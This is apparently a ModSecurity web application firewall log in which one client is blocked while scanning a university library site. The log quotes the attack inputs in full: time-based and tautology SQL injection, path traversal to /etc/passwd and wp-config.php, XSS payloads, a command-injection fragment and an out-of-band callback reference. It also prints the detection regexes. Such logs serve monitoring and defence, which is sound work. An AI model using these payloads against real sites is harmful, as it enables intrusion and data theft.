[Tue Aug 29 11:43:23.431286 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13a8Co-f0AAAe1eesAAAAB"]
[Tue Aug 29 11:43:27.675505 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAAfBLxwAAAAI"]
[Tue Aug 29 11:43:28.621364 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAfEBsQAAAAO"]
[Tue Aug 29 11:43:29.558624 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ccCo-f0AAAfGaYAAAAAT"]
[Tue Aug 29 11:43:31.363654 2023] [:error] [pid 1984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13c8Co-f0AAAfAOaAAAAAH"]
[Tue Aug 29 11:43:31.508576 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAAfBLzEAAAAI"]
[Tue Aug 29 11:43:36.381321 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAAe8l1kAAAAF"]
[Tue Aug 29 11:43:37.435748 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAAfEBuUAAAAO"]
[Tue Aug 29 11:43:40.371407 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAAfBL0YAAAAI"]
[Tue Aug 29 11:43:40.451602 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAAfGaZsAAAAT"]
[Tue Aug 29 11:43:42.508208 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAAeCheUAAAAw"]
[Tue Aug 29 11:43:44.368491 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/file"] [unique_id "ZO13gMCo-f0AAAe8l28AAAAF"]
[Tue Aug 29 11:43:45.369312 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gcCo-f0AAAenGaoAAAAM"]
[Tue Aug 29 11:43:47.418051 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAAdxUZAAAAAC"]
[Tue Aug 29 11:43:48.375048 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAAcsLM8AAAAE"]
[Tue Aug 29 11:43:48.451431 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAAdxUZcAAAAC"]
[Tue Aug 29 11:43:49.435623 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAe8l4kAAAAF"]
[Tue Aug 29 11:43:50.416149 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "perpustakaan.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAAenGcIAAAAM"]
[Tue Aug 29 11:43:50.450967 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAAfBL2wAAAAI"]
[Tue Aug 29 11:43:51.401035 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAARphAcAAAAU"]
[Tue Aug 29 11:43:55.384351 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAfWNzkAAAAL"]
[Tue Aug 29 11:43:55.724092 2023] [:error] [pid 2015] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAffoq4AAAAd"]
[Tue Aug 29 11:43:56.370432 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jMCo-f0AAAfbkrMAAAAZ"]
[Tue Aug 29 11:43:57.397277 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAe8l7EAAAAF"]
[Tue Aug 29 11:43:58.381254 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAfBL3oAAAAI"]
[Tue Aug 29 11:43:59.394647 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAAdeQ8QAAAAQ"]
[Tue Aug 29 11:44:03.372605 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAdQ3ocAAAAV"]
[Tue Aug 29 11:44:03.739393 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAdb7xQAAAAb"]
[Tue Aug 29 11:44:08.391421 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13mMCo-f0AAAfWN0oAAAAL"]
[Tue Aug 29 11:44:08.420566 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAc4EvwAAAAP"]
[Tue Aug 29 11:44:08.447984 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAdxUcwAAAAC"]
[Tue Aug 29 11:44:10.528374 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAc4EwUAAAAP"]
